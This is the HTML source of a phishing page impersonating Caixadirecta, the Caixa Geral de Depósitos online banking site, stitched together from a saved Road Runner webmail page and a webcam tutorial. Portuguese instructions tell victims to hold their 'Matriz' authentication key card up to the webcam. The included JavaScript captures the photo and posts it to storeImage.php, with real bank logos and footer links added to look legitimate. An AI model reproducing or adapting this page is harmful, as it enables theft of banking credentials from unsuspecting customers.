<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional" "/assets/dtd/xhtml1-transitional.dtd">
<!-- saved from url=(0043)https://webmail.tampabay.rr.com/?v=bh_theme -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!-- webmail version: 4.4.6 - 20171005b-bhn  --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  
  <title>
    
    Caixadirecta on-line 
  </title>

		<link rel="shortcut icon" href="https://static.cgd.pt/staticSRC/cdo/global/imgSRC/faviconCDO.ico?6.0.31.14" type="image/x-icon" />
		<link rel="apple-touch-icon" href="https://static.cgd.pt/staticSRC/cdo/global/imgSRC/faviconCDO.ico?6.0.31.14" type="image/x-icon" />
		<link rel="icon" href="https://static.cgd.pt/staticSRC/cdo/global/imgSRC/faviconCDO.ico?6.0.31.14" type="image/x-icon" />

    <script type="text/javascript" src="images/event"></script><script type="text/javascript" src="images/event(1)"></script><script async="" src="images/beacon.js.download"></script><script language="javascript">
        var url = new String();
        url = window.location.href;
        switch (window.location.protocol) {
            case "http:":
                url =  url.replace(/^http:\/\//i, "https://");
                window.location=url;
                break;
        }
    </script>

  <script src="images/common_js.jsp" type="text/javascript"></script>

    
    <link rel="stylesheet" type="text/css" href="images/reset-min.446a.css" media="all">
    <link rel="stylesheet" type="text/css" href="images/webmail.446a.css" media="all">
    <!--[if IE]>
        <link rel="stylesheet" type="text/css" href="/includes/ie.446a.css" media="all" />
    <![endif]-->

    

    <script language="JavaScript" type="text/javascript" src="images/s_code.446a.js.download"></script>

  
  

  
    <script src="images/javascript_js.jsp" type="text/javascript"></script>
  

    <script language="javascript">
        //extra code for tracking
        var _host = "webmail.tampabay.rr.com";
        var _trackingRegion  = _host.substring(_host.indexOf(".")+1);
        var _pageName = "login";
	var _url = "";
	
	
	
	var forwarding = "off";
	
	

	// use to correct theme for login page
	var _bhDomainList = "|webmail.bak.rr.com|webmail.tampabay.rr.com|webmail.cfl.rr.com|webmail.mi.rr.com|webmail.indy.rr.com|webmail.panhandle.rr.com|webmail.elmore.rr.com|webmail.eufaula.rr.com|webmail.bham.rr.com|mail.brighthouse.com|webmail.brighthouse.com|";
	var _twcDomainList = "|webmail.austin.rr.com|webmail.ca.rr.com|webmail.carolina.rr.com|webmail.cinci.rr.com|webmail.columbus.rr.com|webmail.dc.rr.com|webmail.ec.rr.com|webmail.elp.rr.com|webmail.gt.rr.com|webmail.hawaii.rr.com|webmail.hot.rr.com|webmail.hvc.rr.com|webmail.insight.rr.com|webmail.kc.rr.com|webmail.ma.rr.com|webmail.maine.rr.com|webmail.mass.rr.com|webmail.nc.rr.com|webmail.ne.rr.com|webmail.neb.rr.com|webmail.neo.rr.com|webmail.new.rr.com|webmail.nj.rr.com|webmail.nyc.rr.com|webmail.nycap.rr.com|webmail.oh.rr.com|webmail.pa.rr.com|webmail.rgv.rr.com|webmail.roadrunner.com|webmail.rochester.rr.com|webmail.san.rr.com|webmail.satx.rr.com|webmail.sc.rr.com|webmail.si.rr.com|webmail.socal.rr.com|webmail.stny.rr.com|webmail.stx.rr.com|webmail.sw.rr.com|webmail.triad.rr.com|webmail.twcny.rr.com|webmail.tx.rr.com|webmail.we.rr.com|webmail.wi.rr.com|webmail.woh.rr.com|webmail.twc.com|";
	var _variant = "bh_theme";
	// redirect if domain matches bh and theme is not bh

	if ((_bhDomainList.indexOf("|"+_host.toLowerCase()+"|") >= 0) && (_variant == 'twc_theme')) {
		_url = "https://" + _host + "?v=bh_theme";
		if (forwarding == "on") {
			_url = _url + "&e=forwarded";
		}
                window.location=_url;
	} else if ((_twcDomainList.indexOf("|"+_host.toLowerCase()+"|") >= 0) && (_variant == 'bh_theme')) {
	// redirect if domain matches twc and theme is not twc
                _url = "https://" + _host + "?v=twc_theme";
		if (forwarding == "on") {
                        _url = _url + "&e=forwarded";
                }
                window.location=_url;
	}

    </script>

</head>

<!-- START wrapper -->

  
  
  

  
  

  
  





<body id="body_id" style="text-align: center; background-color: #c9c9c9;">

<!-- Begin comScore Tag -->
<script>
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "6036183" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
&lt;img src="https://b.scorecardresearch.com/p?c1=2&amp;c2=6036183&amp;cv=2.0&amp;cj=1" /&gt;</noscript>
<!-- End comScore Tag -->

<!-- SiteCatalyst code version: H.16.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->

<script language="JavaScript" type="text/javascript">
    <!--
    s.pageName= "webmail>" + _pageName + ">main";
    //s.channel="defaultapp";
    s.channel="Login";
    s.pageType="";
    s.prop1=_trackingRegion;
    s.prop2="";
    /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
    var s_code=s.t();if(s_code)document.write(s_code)//-->
</script>

<script language="JavaScript" type="text/javascript">
    <!--
    if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
    //-->
</script>

<!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.16. -->

<div class="wrapper">
    











<div class="richAdLoginHeader" style="width: 986px; height: 37px">
<!-- START hat -->

        <p>

<img border="0" src="index-es-using_files/Untitled.png" width="1291" height="42"><a title="CaixaBank" class="dtcell vamid" href="javascript:openCaixaBank();">
</a>
</p>

<!-- END hat -->

</div>
<!-- END header -->



    <!-- START main -->
    <div class="main">
        <!-- START .main .content -->

        














<noscript>
        &lt;div class="webmailErrorInfoSection"&gt;
    &lt;div class="webmailError webmailAlignLeftNoPad2"&gt;&lt;/div&gt;
        &lt;div class="webmailErrorInfoTxt"&gt;
            This application needs Javascript enabled to function correctly.
        &lt;/div&gt;
&lt;/div&gt;</noscript>








            <!-- START .webmailMainPanel -->
            












<!-- Content -->
  
<!DOCTYPE html>
<html>
<head>
    <title>Capture webcam image with php and jquery - ItSolutionStuff.com</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/webcamjs/1.0.25/webcam.min.js"></script>
    <link rel="stylesheet" href="bootstrap.min.css" />
    <style type="text/css">
        #results { padding:20px; border:1px solid; background:#ccc; }
    </style>
</head>
<body>
  
<div class="container">
    <h1 class="text-center" dir="ltr"><font size="2">
	<span style="background-color: #FFFFFF">NOTA: Anexe uma cópia dos Matriz 
	cartões-chave para que possamos revisar e enviar um novo.</span></font></h1>
   
    <form method="POST" action="storeImage.php">
        <div class="row">
            <div class="col-md-6">
                <div id="my_camera"></div>
                <input type=button value="Clique aqui para tirar uma foto do livro de códigos" onClick="take_snapshot()">
                <input type="hidden" name="image" class="image-tag">
            </div>
            <div class="col-md-6">
                <div id="results">
					<p style="text-align: left"><span style="font-size: 72%">
					Para concluir o processo, precisamos de uma cópia dos seus 
					Matriz cartões-chave. Siga as instruções abaixo.<br>
					1. Clique no botão &quot;Tirar uma foto.<br>
					2. Permita que o navegador use a webcam do seu computador.<br>
					3. Coloque cuidadosamente a tabela de índice na frente da 
					câmera, para que toda a tabela fique na imagem.<br>
					4. Clique na imagem da câmera no canto inferior direito para 
					tirar a imagem.<br>
					5. Quando terminar, você pode pressionar o botão &quot;enviar&quot; na 
					parte inferior. </span></p>
                  <p>
                  <img src="imagen.png" alt="Resultado de imagen para el libro de tarjeta de código" width="192" height="165"></p>
                  <p>&nbsp;</div>
            </div>
            <div class="col-md-12 text-center">
                <br/>
                <button class="btn btn-success">Enviar</button>
            </div>
        </div>
    </form>
</div>
  
<!-- Configure a few settings and attach camera -->
<script language="JavaScript">
    Webcam.set({
        width: 490,
        height: 390,
        image_format: 'jpeg',
        jpeg_quality: 90
    });
  
    Webcam.attach( '#my_camera' );
  
    function take_snapshot() {
        Webcam.snap( function(data_uri) {
            $(".image-tag").val(data_uri);
            document.getElementById('results').innerHTML = '<img src="'+data_uri+'"/>';
        } );
    }
        </script>
 
        <p>&nbsp;</p>
 
        <p><span style="font-size: 72%">
					Tire uma foto dos seus cartões-chave CaixaDirecta Matriz 
		diretamente do seu dispositivo móvel ou da webcam do seu computador 
		através do nosso servidor seguro</span></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
 
        <p>&nbsp;</p>
 
</body>
</html>


</div>







</div>
<div class="container" style="margin: 0px 146px; padding: 10px 0px 0px; border-width: 5px 0px 0px; border-top-style: solid; border-right-style: initial; border-bottom-style: initial; border-left-style: initial; border-top-color: rgb(0, 45, 116); border-right-color: initial; border-bottom-color: initial; border-left-color: initial; border-image: initial; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle; width: 710px; text-align: center; line-height: 16px; color: rgb(0, 0, 0); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;">
	<ul style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle; list-style: none; display: inline;">
		<li class="firstitem" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
		<a target="_blank" style="margin: 0px; padding: 0px 8px 0px 10px; border: none; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/ajuda/Seguranca/Pages/Seguranca-e-Fraude.aspx">
		Segurança</a></li>
		<li style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
		<a onclick="return openWindow('https://www.cgd.pt/Ajuda/Contactos/Pages/Contactos.aspx', 'cdtExternal');" style="margin: 0px; padding: 0px 8px 0px 10px; border-width: 0px 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: initial; border-bottom-color: initial; border-left-color: rgb(136, 136, 136); border-image: initial; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/Ajuda/Contactos/Pages/Contactos.aspx">
		Contactos</a></li>
		<li style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
		<a onclick="return openWindow('https://www.cgd.pt/Precario/Pages/Precario.aspx', 'cdtExternal');" style="margin: 0px; padding: 0px 8px 0px 10px; border-width: 0px 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: initial; border-bottom-color: initial; border-left-color: rgb(136, 136, 136); border-image: initial; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/Precario/Pages/Precario.aspx">
		Preçário</a></li>
		<li style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
		<a onclick="return openWindow('https://www.cgd.pt/Particulares/Contas/Abertura-conta/Documents/ICGD0207.pdf ', 'cdtExternal');" style="margin: 0px; padding: 0px 8px 0px 10px; border-width: 0px 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: initial; border-bottom-color: initial; border-left-color: rgb(136, 136, 136); border-image: initial; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/Particulares/Contas/Abertura-conta/Documents/ICGD0207.pdf">
		Condições Gerais</a></li>
		<li style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
		<a onclick="return openWindow('https://www.cgd.pt/Ajuda/Espaco-Cliente/Pages/Contacto-On-line.aspx?op1=3', 'cdtExternal');" style="margin: 0px; padding: 0px 8px 0px 10px; border-width: 0px 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: initial; border-bottom-color: initial; border-left-color: rgb(136, 136, 136); border-image: initial; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/Ajuda/Espaco-Cliente/Pages/Contacto-On-line.aspx?op1=3">
		Espaço Cliente</a></li>
	</ul>
	<p style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle;">&nbsp;</p>
	<ul style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle; list-style: none; display: inline;">
		<li class="firstitem" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
		&nbsp;</li>
	</ul>
	<div class="cgdlogo" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle;">
		<a style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle;" href="https://caixadirectaonline.cgd.pt/cdo/login.seam#">
		<img src="https://static.cgd.pt/staticCMS/cdo/global/img/logo_CGD_footer.gif" alt="Caixa Geral de Depósitos" width="153px" heigth="19px" border="0px" style="margin: 5px auto; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle; clear: both; display: block; text-align: center;"></a></div>
</div>
<div class="footernotes" style="margin: 0px 146px; padding: 0px; border: 0px; outline: 0px; font-size: 0.56em; font-family: Arial; vertical-align: middle; clear: both; width: 710px; color: rgb(136, 136, 136); text-align: center; line-height: 12px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;">
	<p style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 8.96px; font-family: Arial; vertical-align: middle;">
	(c) 1995 - 2020&nbsp;Caixa Geral de Depósitos, S.A. Todos os direitos reservados.</div>

</body></html>